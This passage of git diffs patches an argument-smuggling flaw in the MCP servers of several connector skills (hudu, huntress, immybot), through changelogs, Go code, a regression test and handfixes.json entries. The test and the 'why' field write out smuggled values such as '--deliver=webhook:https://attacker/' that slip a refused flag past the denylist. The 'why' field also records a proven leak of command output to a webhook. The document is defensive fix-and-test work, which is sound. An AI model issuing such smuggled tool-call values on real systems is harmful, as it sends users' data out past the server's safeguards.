+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "out = append(out, \"--\"+k+\"=\"+tv)",
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "\"--\"+k+\"=\"+",
+     "min_count": 4,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "not_contains": "\"--\"+k, "
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout_test.go",
+     "contains": "func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(",
+     "min_count": 1
+    }
+   ]
   }
  ]
 }

--- a/skills/hudu/CHANGELOG.md
+++ b/skills/hudu/CHANGELOG.md
@@ -11,9 +11,10 @@ All notable changes to this skill are documented here. Format follows
   handed each tool argument to the CLI as two separate words, the flag and then its value.
   On a yes/no flag the CLI does not read the next word as a value, so a value that itself
   began with `--` was read as a brand-new flag, including flags the server deliberately
-  refuses such as `--deliver`, which can send command output to a URL. Each value now
-  travels glued to its flag as one word (`--flag=value`), so the CLI only ever reads it as
-  the value of that one named flag, or rejects it, and it can never become a second flag.
+  refuses such as `--deliver`, which can send command output to a URL. Every argument that
+  carries a value now travels glued to its flag as one word (`--flag=value`), so the CLI only
+  ever reads it as the value of that one named flag, or rejects it, and it can never become a
+  second flag. A plain yes/no flag is still a bare `--flag`, and an empty value is still left out.
   Reported privately through SECURITY.md; the same fix is in the pending DataGate connector.
 
 ## [0.1.9] - 2026-09-01

--- a/skills/hudu/CHANGELOG.md
+++ b/skills/hudu/CHANGELOG.md
@@ -4,6 +4,18 @@ All notable changes to this skill are documented here. Format follows
 [Keep a Changelog](https://keepachangelog.com/); versions follow
 [semantic versioning](https://semver.org/).
 
+## [0.1.10]
+
+### Fixed
+- **A tool-call value could smuggle a refused flag past the MCP server.** The MCP server
+  handed each tool argument to the CLI as two separate words, the flag and then its value.
+  On a yes/no flag the CLI does not read the next word as a value, so a value that itself
+  began with `--` was read as a brand-new flag, including flags the server deliberately
+  refuses such as `--deliver`, which can send command output to a URL. Each value now
+  travels glued to its flag as one word (`--flag=value`), so it is either rejected outright
+  or kept as literal text and can never become a second flag. Reported privately through
+  SECURITY.md; the same fix already ships in the DataGate connector.
+
 ## [0.1.9] - 2026-09-01
 
 ### Added

--- a/skills/hudu/CHANGELOG.md
+++ b/skills/hudu/CHANGELOG.md
@@ -12,9 +12,9 @@ All notable changes to this skill are documented here. Format follows
   On a yes/no flag the CLI does not read the next word as a value, so a value that itself
   began with `--` was read as a brand-new flag, including flags the server deliberately
   refuses such as `--deliver`, which can send command output to a URL. Each value now
-  travels glued to its flag as one word (`--flag=value`), so it is either rejected outright
-  or kept as literal text and can never become a second flag. Reported privately through
-  SECURITY.md; the same fix already ships in the DataGate connector.
+  travels glued to its flag as one word (`--flag=value`), so the CLI only ever reads it as
+  the value of that one named flag, or rejects it, and it can never become a second flag.
+  Reported privately through SECURITY.md; the same fix is in the pending DataGate connector.
 
 ## [0.1.9] - 2026-09-01
 

--- a/skills/hudu/cli/internal/mcp/cobratree/filesystem_gate_test.go
+++ b/skills/hudu/cli/internal/mcp/cobratree/filesystem_gate_test.go
@@ -20,8 +20,10 @@ func forwardedCLIArgs(args map[string]any) []string {
 }
 
 func hasFlagPair(argv []string, flag, value string) bool {
-	for i := 0; i+1 < len(argv); i++ {
-		if argv[i] == flag && argv[i+1] == value {
+	// Values are joined to their flag (handfixes.json: mcp-argv-value-joined),
+	// so the pair is one argv element.
+	for _, a := range argv {
+		if a == flag+"="+value {
 			return true
 		}
 	}

--- a/skills/hudu/cli/internal/mcp/cobratree/shellout.go
+++ b/skills/hudu/cli/internal/mcp/cobratree/shellout.go
@@ -201,6 +201,13 @@ func cliArgsFromMCP(args map[string]any) []string {
 	}
 	sort.Strings(keys)
 
+	// Hand-wired (handfixes.json: mcp-argv-value-joined): every value is
+	// joined to its flag as ONE argv element. Emitted as a separate element,
+	// a value beginning with "--" is parsed by pflag as its own flag whenever
+	// the preceding flag is a bool (NoOptDefVal does not consume the next
+	// token), which let a tool-call VALUE smuggle a denylisted root flag past
+	// the key-only filter above. Joined, pflag rejects it on a bool flag and
+	// contains it as the literal value on a string flag.
 	var out []string
 	for _, k := range keys {
 		v := args[k]
@@ -210,10 +217,10 @@ func cliArgsFromMCP(args map[string]any) []string {
 				out = append(out, "--"+k)
 			}
 		case float64:
-			out = append(out, "--"+k, strconv.FormatFloat(tv, 'f', -1, 64))
+			out = append(out, "--"+k+"="+strconv.FormatFloat(tv, 'f', -1, 64))
 		case string:
 			if tv != "" {
-				out = append(out, "--"+k, tv)
+				out = append(out, "--"+k+"="+tv)
 			}
 		case []any:
 			if len(tv) > 0 {
@@ -221,11 +228,11 @@ func cliArgsFromMCP(args map[string]any) []string {
 				for _, item := range tv {
 					parts = append(parts, fmt.Sprintf("%v", item))
 				}
-				out = append(out, "--"+k, strings.Join(parts, ","))
+				out = append(out, "--"+k+"="+strings.Join(parts, ","))
 			}
 		default:
 			if v != nil {
-				out = append(out, "--"+k, fmt.Sprintf("%v", v))
+				out = append(out, "--"+k+"="+fmt.Sprintf("%v", v))
 			}
 		}
 	}

--- a/skills/hudu/cli/internal/mcp/cobratree/shellout_test.go
+++ b/skills/hudu/cli/internal/mcp/cobratree/shellout_test.go
@@ -287,15 +287,20 @@ func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(t *testing.T) {
 		t.Fatalf("smuggled --deliver took effect through a string flag: %q", deliver)
 	}
 
-	// Every value-carrying type is joined, never split.
-	for name, args := range map[string]map[string]any{
-		"float": {"limit": 5.0},
-		"list":  {"ids": []any{"a", "b"}},
+	// Every value-carrying branch emits exactly ONE element - including the
+	// default branch (a nested object) - so no branch can split at runtime.
+	for _, tc := range []struct {
+		name string
+		args map[string]any
+		want string
+	}{
+		{"float", map[string]any{"limit": 5.0}, "--limit=5"},
+		{"list", map[string]any{"ids": []any{"a", "b"}}, "--ids=a,b"},
+		{"object", map[string]any{"filter": map[string]any{"a": "1"}}, "--filter=map[a:1]"},
 	} {
-		for _, tok := range cliArgsFromMCP(args) {
-			if !strings.Contains(tok, "=") {
-				t.Fatalf("%s: value emitted as its own argv element: %q", name, tok)
-			}
+		got := cliArgsFromMCP(tc.args)
+		if len(got) != 1 || got[0] != tc.want {
+			t.Fatalf("%s: got %#v, want exactly [%q]", tc.name, got, tc.want)
 		}
 	}
 }

--- a/skills/hudu/cli/internal/mcp/cobratree/shellout_test.go
+++ b/skills/hudu/cli/internal/mcp/cobratree/shellout_test.go
@@ -5,6 +5,7 @@ package cobratree
 
 import (
 	"context"
+	"github.com/spf13/cobra"
 	"os"
 	"path/filepath"
 	"reflect"
@@ -64,7 +65,7 @@ func TestCliArgsFromMCP_BlocksRootFlags(t *testing.T) {
 		"limit": float64(10),
 	}
 	got := cliArgsFromMCP(in)
-	want := []string{"--limit", "10"}
+	want := []string{"--limit=10"}
 	if !reflect.DeepEqual(got, want) {
 		t.Fatalf("cliArgsFromMCP dropped/kept wrong keys: got %v, want %v", got, want)
 	}
@@ -93,7 +94,7 @@ func TestCliArgsFromMCP_AllowsPerCommandFlags(t *testing.T) {
 		"tags":    []any{"a", "b"},
 	}
 	got := cliArgsFromMCP(in)
-	want := []string{"--limit", "25", "--query", "alpha", "--tags", "a,b", "--verbose"}
+	want := []string{"--limit=25", "--query=alpha", "--tags=a,b", "--verbose"}
 	if !reflect.DeepEqual(got, want) {
 		t.Fatalf("cliArgsFromMCP per-command passthrough: got %v, want %v", got, want)
 	}
@@ -225,4 +226,76 @@ func writeShelloutHelper(t *testing.T, mode string) string {
 		t.Fatalf("write helper: %v", err)
 	}
 	return path
+}
+
+// TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag guards the hand-fix
+// mcp-argv-value-joined (handfixes.json). blockedRootFlags filters KEYS; the
+// converter used to emit each value as its own argv element, and because a
+// Cobra bool flag has NoOptDefVal and does not consume the token after it,
+// pflag parsed that value as a second flag - so {"json": "--deliver=..."}
+// became `--json --deliver=...` and the denylisted --deliver took effect.
+// Every value must now be joined to its flag as ONE element, and that element
+// must be inert when the real flag set parses it: refused on a bool flag,
+// contained on a string flag.
+func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(t *testing.T) {
+	const smuggled = "--deliver=webhook:https://x/"
+	got := cliArgsFromMCP(map[string]any{"json": smuggled})
+	want := []string{"--json=" + smuggled}
+	if !reflect.DeepEqual(got, want) {
+		t.Fatalf("cliArgsFromMCP emitted the value as its own argv element: got %#v, want %#v", got, want)
+	}
+
+	newRoot := func(jsonIsBool bool) *cobra.Command {
+		root := &cobra.Command{Use: "root"}
+		if jsonIsBool {
+			root.Flags().Bool("json", false, "json output")
+		} else {
+			root.Flags().String("json", "", "json output")
+		}
+		root.Flags().String("deliver", "", "delivery target")
+		return root
+	}
+
+	// The defect shape, so the guard is proven in both directions: the split
+	// emission really does let --deliver through a bool --json.
+	split := newRoot(true)
+	if err := split.ParseFlags([]string{"--json", smuggled}); err != nil {
+		t.Fatalf("defect-shape probe: split argv did not parse: %v", err)
+	}
+	if deliver, _ := split.Flags().GetString("deliver"); deliver != "webhook:https://x/" {
+		t.Fatalf("defect-shape probe: split argv should have set --deliver, got %q", deliver)
+	}
+
+	// Joined onto a bool flag, pflag refuses the value outright ...
+	boolRoot := newRoot(true)
+	if err := boolRoot.ParseFlags(got); err == nil {
+		t.Fatalf("pflag accepted %q as a bool --json value", got[0])
+	}
+	if deliver, _ := boolRoot.Flags().GetString("deliver"); deliver != "" {
+		t.Fatalf("smuggled --deliver took effect through a bool flag: %q", deliver)
+	}
+
+	// ... and joined onto a string flag it is contained as the literal value.
+	strRoot := newRoot(false)
+	if err := strRoot.ParseFlags(got); err != nil {
+		t.Fatalf("joined argv did not parse on a string flag: %v", err)
+	}
+	if v, _ := strRoot.Flags().GetString("json"); v != smuggled {
+		t.Fatalf("string --json = %q, want the literal value %q", v, smuggled)
+	}
+	if deliver, _ := strRoot.Flags().GetString("deliver"); deliver != "" {
+		t.Fatalf("smuggled --deliver took effect through a string flag: %q", deliver)
+	}
+
+	// Every value-carrying type is joined, never split.
+	for name, args := range map[string]map[string]any{
+		"float": {"limit": 5.0},
+		"list":  {"ids": []any{"a", "b"}},
+	} {
+		for _, tok := range cliArgsFromMCP(args) {
+			if !strings.Contains(tok, "=") {
+				t.Fatalf("%s: value emitted as its own argv element: %q", name, tok)
+			}
+		}
+	}
 }

--- a/skills/hudu/handfixes.json
+++ b/skills/hudu/handfixes.json
@@ -496,8 +496,20 @@
     },
     {
      "file": "cli/internal/mcp/cobratree/shellout.go",
-     "contains": "\"--\"+k+\"=\"+",
-     "min_count": 4,
+     "contains": "out = append(out, \"--\"+k+\"=\"+strconv.FormatFloat(tv, 'f', -1, 64))",
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "out = append(out, \"--\"+k+\"=\"+strings.Join(parts, \",\"))",
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "out = append(out, \"--\"+k+\"=\"+fmt.Sprintf(\"%v\", v))",
+     "min_count": 1,
      "code_only": true
     },
     {
@@ -507,7 +519,14 @@
     {
      "file": "cli/internal/mcp/cobratree/shellout_test.go",
      "contains": "func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(",
-     "min_count": 1
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout_test.go",
+     "contains": "\"--filter=map[a:1]\"",
+     "min_count": 1,
+     "code_only": true
     }
    ]
   }

--- a/skills/hudu/handfixes.json
+++ b/skills/hudu/handfixes.json
@@ -481,6 +481,35 @@
      "min_count": 1
     }
    ]
+  },
+  {
+   "id": "mcp-argv-value-joined",
+   "summary": "cliArgsFromMCP emitted every tool-call value as its OWN argv element after its flag (--json <value>). Every value-carrying branch (string, float64, []any, default) now joins the value to the flag as one element (--json=<value>); bool true stays a bare --flag and the empty-string skip is unchanged.",
+   "why": "blockedRootFlags and blockedDestinationFlags filter KEYS only. A Cobra bool flag has NoOptDefVal and does not consume the token after it, so a tool-call VALUE that begins with '--' was parsed by pflag as its own flag: {\"json\": \"--deliver=webhook:https://attacker/\"} became argv `--json --deliver=webhook:...` and the denylisted --deliver took effect. Proven end to end on the real hudu-mcp binary (this same generated shellout.go) during the PR #317 review: a local webhook received 4,797 bytes of `doctor --json` output. Reported privately per SECURITY.md on 2026-09-09 as affecting the whole fleet (six connectors spot-checked by the reporter); this is the fleet backport of datagate commit 4075043e. Joined, pflag rejects the value outright on a bool flag (strconv.ParseBool) and contains it as the literal value on a string flag, so no value can ever reach a second flag. Fixed upstream in cli-printing-press main at be378adf (#4647, closes #4643, 2026-09-09) with the identical four lines, but NOT yet in a tagged press release (latest 4.32.1), so a reprint from any press at or below 4.32.1 REINTRODUCES the defect while go build and go test stay green; this entry is what notices. Retire it only after a reprint from a press release that carries #4647. code_only because the explanatory comment above the loop describes the joined form - the assert must be satisfied by the emission lines themselves. shellout_test.go (TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag) proves both directions: the split argv sets --deliver, the joined argv cannot.",
+   "status": "active",
+   "asserts": [
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "out = append(out, \"--\"+k+\"=\"+tv)",
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "\"--\"+k+\"=\"+",
+     "min_count": 4,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "not_contains": "\"--\"+k, "
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout_test.go",
+     "contains": "func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(",
+     "min_count": 1
+    }
+   ]
   }
  ]
 }

--- a/skills/huntress/CHANGELOG.md
+++ b/skills/huntress/CHANGELOG.md
@@ -4,6 +4,18 @@ All notable changes to this skill are documented here. Format follows
 [Keep a Changelog](https://keepachangelog.com/); versions follow
 [semantic versioning](https://semver.org/).
 
+## [0.1.5]
+
+### Fixed
+- **A tool-call value could smuggle a refused flag past the MCP server.** The MCP server
+  handed each tool argument to the CLI as two separate words, the flag and then its value.
+  On a yes/no flag the CLI does not read the next word as a value, so a value that itself
+  began with `--` was read as a brand-new flag, including flags the server deliberately
+  refuses such as `--deliver`, which can send command output to a URL. Each value now
+  travels glued to its flag as one word (`--flag=value`), so it is either rejected outright
+  or kept as literal text and can never become a second flag. Reported privately through
+  SECURITY.md; the same fix already ships in the DataGate connector.
+
 ## [0.1.4] - 2026-08-26
 
 ### Fixed

--- a/skills/huntress/CHANGELOG.md
+++ b/skills/huntress/CHANGELOG.md
@@ -12,9 +12,9 @@ All notable changes to this skill are documented here. Format follows
   On a yes/no flag the CLI does not read the next word as a value, so a value that itself
   began with `--` was read as a brand-new flag, including flags the server deliberately
   refuses such as `--deliver`, which can send command output to a URL. Each value now
-  travels glued to its flag as one word (`--flag=value`), so it is either rejected outright
-  or kept as literal text and can never become a second flag. Reported privately through
-  SECURITY.md; the same fix already ships in the DataGate connector.
+  travels glued to its flag as one word (`--flag=value`), so the CLI only ever reads it as
+  the value of that one named flag, or rejects it, and it can never become a second flag.
+  Reported privately through SECURITY.md; the same fix is in the pending DataGate connector.
 
 ## [0.1.4] - 2026-08-26
 

--- a/skills/huntress/CHANGELOG.md
+++ b/skills/huntress/CHANGELOG.md
@@ -11,9 +11,10 @@ All notable changes to this skill are documented here. Format follows
   handed each tool argument to the CLI as two separate words, the flag and then its value.
   On a yes/no flag the CLI does not read the next word as a value, so a value that itself
   began with `--` was read as a brand-new flag, including flags the server deliberately
-  refuses such as `--deliver`, which can send command output to a URL. Each value now
-  travels glued to its flag as one word (`--flag=value`), so the CLI only ever reads it as
-  the value of that one named flag, or rejects it, and it can never become a second flag.
+  refuses such as `--deliver`, which can send command output to a URL. Every argument that
+  carries a value now travels glued to its flag as one word (`--flag=value`), so the CLI only
+  ever reads it as the value of that one named flag, or rejects it, and it can never become a
+  second flag. A plain yes/no flag is still a bare `--flag`, and an empty value is still left out.
   Reported privately through SECURITY.md; the same fix is in the pending DataGate connector.
 
 ## [0.1.4] - 2026-08-26

--- a/skills/huntress/cli/internal/mcp/cobratree/filesystem_gate_test.go
+++ b/skills/huntress/cli/internal/mcp/cobratree/filesystem_gate_test.go
@@ -20,8 +20,10 @@ func forwardedCLIArgs(args map[string]any) []string {
 }
 
 func hasFlagPair(argv []string, flag, value string) bool {
-	for i := 0; i+1 < len(argv); i++ {
-		if argv[i] == flag && argv[i+1] == value {
+	// Values are joined to their flag (handfixes.json: mcp-argv-value-joined),
+	// so the pair is one argv element.
+	for _, a := range argv {
+		if a == flag+"="+value {
 			return true
 		}
 	}

--- a/skills/huntress/cli/internal/mcp/cobratree/shellout.go
+++ b/skills/huntress/cli/internal/mcp/cobratree/shellout.go
@@ -200,6 +200,13 @@ func cliArgsFromMCP(args map[string]any) []string {
 	}
 	sort.Strings(keys)
 
+	// Hand-wired (handfixes.json: mcp-argv-value-joined): every value is
+	// joined to its flag as ONE argv element. Emitted as a separate element,
+	// a value beginning with "--" is parsed by pflag as its own flag whenever
+	// the preceding flag is a bool (NoOptDefVal does not consume the next
+	// token), which let a tool-call VALUE smuggle a denylisted root flag past
+	// the key-only filter above. Joined, pflag rejects it on a bool flag and
+	// contains it as the literal value on a string flag.
 	var out []string
 	for _, k := range keys {
 		v := args[k]
@@ -209,10 +216,10 @@ func cliArgsFromMCP(args map[string]any) []string {
 				out = append(out, "--"+k)
 			}
 		case float64:
-			out = append(out, "--"+k, strconv.FormatFloat(tv, 'f', -1, 64))
+			out = append(out, "--"+k+"="+strconv.FormatFloat(tv, 'f', -1, 64))
 		case string:
 			if tv != "" {
-				out = append(out, "--"+k, tv)
+				out = append(out, "--"+k+"="+tv)
 			}
 		case []any:
 			if len(tv) > 0 {
@@ -220,11 +227,11 @@ func cliArgsFromMCP(args map[string]any) []string {
 				for _, item := range tv {
 					parts = append(parts, fmt.Sprintf("%v", item))
 				}
-				out = append(out, "--"+k, strings.Join(parts, ","))
+				out = append(out, "--"+k+"="+strings.Join(parts, ","))
 			}
 		default:
 			if v != nil {
-				out = append(out, "--"+k, fmt.Sprintf("%v", v))
+				out = append(out, "--"+k+"="+fmt.Sprintf("%v", v))
 			}
 		}
 	}

--- a/skills/huntress/cli/internal/mcp/cobratree/shellout_test.go
+++ b/skills/huntress/cli/internal/mcp/cobratree/shellout_test.go
@@ -287,15 +287,20 @@ func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(t *testing.T) {
 		t.Fatalf("smuggled --deliver took effect through a string flag: %q", deliver)
 	}
 
-	// Every value-carrying type is joined, never split.
-	for name, args := range map[string]map[string]any{
-		"float": {"limit": 5.0},
-		"list":  {"ids": []any{"a", "b"}},
+	// Every value-carrying branch emits exactly ONE element - including the
+	// default branch (a nested object) - so no branch can split at runtime.
+	for _, tc := range []struct {
+		name string
+		args map[string]any
+		want string
+	}{
+		{"float", map[string]any{"limit": 5.0}, "--limit=5"},
+		{"list", map[string]any{"ids": []any{"a", "b"}}, "--ids=a,b"},
+		{"object", map[string]any{"filter": map[string]any{"a": "1"}}, "--filter=map[a:1]"},
 	} {
-		for _, tok := range cliArgsFromMCP(args) {
-			if !strings.Contains(tok, "=") {
-				t.Fatalf("%s: value emitted as its own argv element: %q", name, tok)
-			}
+		got := cliArgsFromMCP(tc.args)
+		if len(got) != 1 || got[0] != tc.want {
+			t.Fatalf("%s: got %#v, want exactly [%q]", tc.name, got, tc.want)
 		}
 	}
 }

--- a/skills/huntress/cli/internal/mcp/cobratree/shellout_test.go
+++ b/skills/huntress/cli/internal/mcp/cobratree/shellout_test.go
@@ -5,6 +5,7 @@ package cobratree
 
 import (
 	"context"
+	"github.com/spf13/cobra"
 	"os"
 	"path/filepath"
 	"reflect"
@@ -64,7 +65,7 @@ func TestCliArgsFromMCP_BlocksRootFlags(t *testing.T) {
 		"limit": float64(10),
 	}
 	got := cliArgsFromMCP(in)
-	want := []string{"--limit", "10"}
+	want := []string{"--limit=10"}
 	if !reflect.DeepEqual(got, want) {
 		t.Fatalf("cliArgsFromMCP dropped/kept wrong keys: got %v, want %v", got, want)
 	}
@@ -93,7 +94,7 @@ func TestCliArgsFromMCP_AllowsPerCommandFlags(t *testing.T) {
 		"tags":    []any{"a", "b"},
 	}
 	got := cliArgsFromMCP(in)
-	want := []string{"--limit", "25", "--query", "alpha", "--tags", "a,b", "--verbose"}
+	want := []string{"--limit=25", "--query=alpha", "--tags=a,b", "--verbose"}
 	if !reflect.DeepEqual(got, want) {
 		t.Fatalf("cliArgsFromMCP per-command passthrough: got %v, want %v", got, want)
 	}
@@ -225,4 +226,76 @@ func writeShelloutHelper(t *testing.T, mode string) string {
 		t.Fatalf("write helper: %v", err)
 	}
 	return path
+}
+
+// TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag guards the hand-fix
+// mcp-argv-value-joined (handfixes.json). blockedRootFlags filters KEYS; the
+// converter used to emit each value as its own argv element, and because a
+// Cobra bool flag has NoOptDefVal and does not consume the token after it,
+// pflag parsed that value as a second flag - so {"json": "--deliver=..."}
+// became `--json --deliver=...` and the denylisted --deliver took effect.
+// Every value must now be joined to its flag as ONE element, and that element
+// must be inert when the real flag set parses it: refused on a bool flag,
+// contained on a string flag.
+func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(t *testing.T) {
+	const smuggled = "--deliver=webhook:https://x/"
+	got := cliArgsFromMCP(map[string]any{"json": smuggled})
+	want := []string{"--json=" + smuggled}
+	if !reflect.DeepEqual(got, want) {
+		t.Fatalf("cliArgsFromMCP emitted the value as its own argv element: got %#v, want %#v", got, want)
+	}
+
+	newRoot := func(jsonIsBool bool) *cobra.Command {
+		root := &cobra.Command{Use: "root"}
+		if jsonIsBool {
+			root.Flags().Bool("json", false, "json output")
+		} else {
+			root.Flags().String("json", "", "json output")
+		}
+		root.Flags().String("deliver", "", "delivery target")
+		return root
+	}
+
+	// The defect shape, so the guard is proven in both directions: the split
+	// emission really does let --deliver through a bool --json.
+	split := newRoot(true)
+	if err := split.ParseFlags([]string{"--json", smuggled}); err != nil {
+		t.Fatalf("defect-shape probe: split argv did not parse: %v", err)
+	}
+	if deliver, _ := split.Flags().GetString("deliver"); deliver != "webhook:https://x/" {
+		t.Fatalf("defect-shape probe: split argv should have set --deliver, got %q", deliver)
+	}
+
+	// Joined onto a bool flag, pflag refuses the value outright ...
+	boolRoot := newRoot(true)
+	if err := boolRoot.ParseFlags(got); err == nil {
+		t.Fatalf("pflag accepted %q as a bool --json value", got[0])
+	}
+	if deliver, _ := boolRoot.Flags().GetString("deliver"); deliver != "" {
+		t.Fatalf("smuggled --deliver took effect through a bool flag: %q", deliver)
+	}
+
+	// ... and joined onto a string flag it is contained as the literal value.
+	strRoot := newRoot(false)
+	if err := strRoot.ParseFlags(got); err != nil {
+		t.Fatalf("joined argv did not parse on a string flag: %v", err)
+	}
+	if v, _ := strRoot.Flags().GetString("json"); v != smuggled {
+		t.Fatalf("string --json = %q, want the literal value %q", v, smuggled)
+	}
+	if deliver, _ := strRoot.Flags().GetString("deliver"); deliver != "" {
+		t.Fatalf("smuggled --deliver took effect through a string flag: %q", deliver)
+	}
+
+	// Every value-carrying type is joined, never split.
+	for name, args := range map[string]map[string]any{
+		"float": {"limit": 5.0},
+		"list":  {"ids": []any{"a", "b"}},
+	} {
+		for _, tok := range cliArgsFromMCP(args) {
+			if !strings.Contains(tok, "=") {
+				t.Fatalf("%s: value emitted as its own argv element: %q", name, tok)
+			}
+		}
+	}
 }

--- a/skills/huntress/handfixes.json
+++ b/skills/huntress/handfixes.json
@@ -156,8 +156,20 @@
     },
     {
      "file": "cli/internal/mcp/cobratree/shellout.go",
-     "contains": "\"--\"+k+\"=\"+",
-     "min_count": 4,
+     "contains": "out = append(out, \"--\"+k+\"=\"+strconv.FormatFloat(tv, 'f', -1, 64))",
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "out = append(out, \"--\"+k+\"=\"+strings.Join(parts, \",\"))",
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "out = append(out, \"--\"+k+\"=\"+fmt.Sprintf(\"%v\", v))",
+     "min_count": 1,
      "code_only": true
     },
     {
@@ -167,7 +179,14 @@
     {
      "file": "cli/internal/mcp/cobratree/shellout_test.go",
      "contains": "func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(",
-     "min_count": 1
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout_test.go",
+     "contains": "\"--filter=map[a:1]\"",
+     "min_count": 1,
+     "code_only": true
     }
    ]
   }

--- a/skills/huntress/handfixes.json
+++ b/skills/huntress/handfixes.json
@@ -141,6 +141,35 @@
      "min_count": 1
     }
    ]
+  },
+  {
+   "id": "mcp-argv-value-joined",
+   "summary": "cliArgsFromMCP emitted every tool-call value as its OWN argv element after its flag (--json <value>). Every value-carrying branch (string, float64, []any, default) now joins the value to the flag as one element (--json=<value>); bool true stays a bare --flag and the empty-string skip is unchanged.",
+   "why": "blockedRootFlags and blockedDestinationFlags filter KEYS only. A Cobra bool flag has NoOptDefVal and does not consume the token after it, so a tool-call VALUE that begins with '--' was parsed by pflag as its own flag: {\"json\": \"--deliver=webhook:https://attacker/\"} became argv `--json --deliver=webhook:...` and the denylisted --deliver took effect. Proven end to end on the real hudu-mcp binary (this same generated shellout.go) during the PR #317 review: a local webhook received 4,797 bytes of `doctor --json` output. Reported privately per SECURITY.md on 2026-09-09 as affecting the whole fleet (six connectors spot-checked by the reporter); this is the fleet backport of datagate commit 4075043e. Joined, pflag rejects the value outright on a bool flag (strconv.ParseBool) and contains it as the literal value on a string flag, so no value can ever reach a second flag. Fixed upstream in cli-printing-press main at be378adf (#4647, closes #4643, 2026-09-09) with the identical four lines, but NOT yet in a tagged press release (latest 4.32.1), so a reprint from any press at or below 4.32.1 REINTRODUCES the defect while go build and go test stay green; this entry is what notices. Retire it only after a reprint from a press release that carries #4647. code_only because the explanatory comment above the loop describes the joined form - the assert must be satisfied by the emission lines themselves. shellout_test.go (TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag) proves both directions: the split argv sets --deliver, the joined argv cannot.",
+   "status": "active",
+   "asserts": [
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "out = append(out, \"--\"+k+\"=\"+tv)",
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "\"--\"+k+\"=\"+",
+     "min_count": 4,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "not_contains": "\"--\"+k, "
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout_test.go",
+     "contains": "func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(",
+     "min_count": 1
+    }
+   ]
   }
  ]
 }

--- a/skills/immybot/CHANGELOG.md
+++ b/skills/immybot/CHANGELOG.md
@@ -12,9 +12,11 @@ All notable changes to this skill are documented here. Format follows
   On a yes/no flag the CLI does not read the next word as a value, so a value that itself
   began with `--` was read as a brand-new flag, including flags the server deliberately
   refuses such as `--deliver`, which can send command output to a URL. Each value now
-  travels glued to its flag as one word (`--flag=value`), so it is either rejected outright
-  or kept as literal text and can never become a second flag. Reported privately through
-  SECURITY.md; the same fix already ships in the DataGate connector.
+  travels glued to its flag as one word (`--flag=value`), so the CLI only ever reads it as
+  the value of that one named flag, or rejects it, and it can never become a second flag.
+  The recipe shortcut tools, which build their own command line, now also refuse a value
+  that begins with `-` where a plain value is expected.
+  Reported privately through SECURITY.md; the same fix is in the pending DataGate connector.
 
 ## [0.1.3] - 2026-09-01
 

--- a/skills/immybot/CHANGELOG.md
+++ b/skills/immybot/CHANGELOG.md
@@ -11,9 +11,10 @@ All notable changes to this skill are documented here. Format follows
   handed each tool argument to the CLI as two separate words, the flag and then its value.
   On a yes/no flag the CLI does not read the next word as a value, so a value that itself
   began with `--` was read as a brand-new flag, including flags the server deliberately
-  refuses such as `--deliver`, which can send command output to a URL. Each value now
-  travels glued to its flag as one word (`--flag=value`), so the CLI only ever reads it as
-  the value of that one named flag, or rejects it, and it can never become a second flag.
+  refuses such as `--deliver`, which can send command output to a URL. Every argument that
+  carries a value now travels glued to its flag as one word (`--flag=value`), so the CLI only
+  ever reads it as the value of that one named flag, or rejects it, and it can never become a
+  second flag. A plain yes/no flag is still a bare `--flag`, and an empty value is still left out.
   The recipe shortcut tools, which build their own command line, now also refuse a value
   that begins with `-` where a plain value is expected.
   Reported privately through SECURITY.md; the same fix is in the pending DataGate connector.

--- a/skills/immybot/CHANGELOG.md
+++ b/skills/immybot/CHANGELOG.md
@@ -4,6 +4,18 @@ All notable changes to this skill are documented here. Format follows
 [Keep a Changelog](https://keepachangelog.com/); versions follow
 [semantic versioning](https://semver.org/).
 
+## [0.1.4]
+
+### Fixed
+- **A tool-call value could smuggle a refused flag past the MCP server.** The MCP server
+  handed each tool argument to the CLI as two separate words, the flag and then its value.
+  On a yes/no flag the CLI does not read the next word as a value, so a value that itself
+  began with `--` was read as a brand-new flag, including flags the server deliberately
+  refuses such as `--deliver`, which can send command output to a URL. Each value now
+  travels glued to its flag as one word (`--flag=value`), so it is either rejected outright
+  or kept as literal text and can never become a second flag. Reported privately through
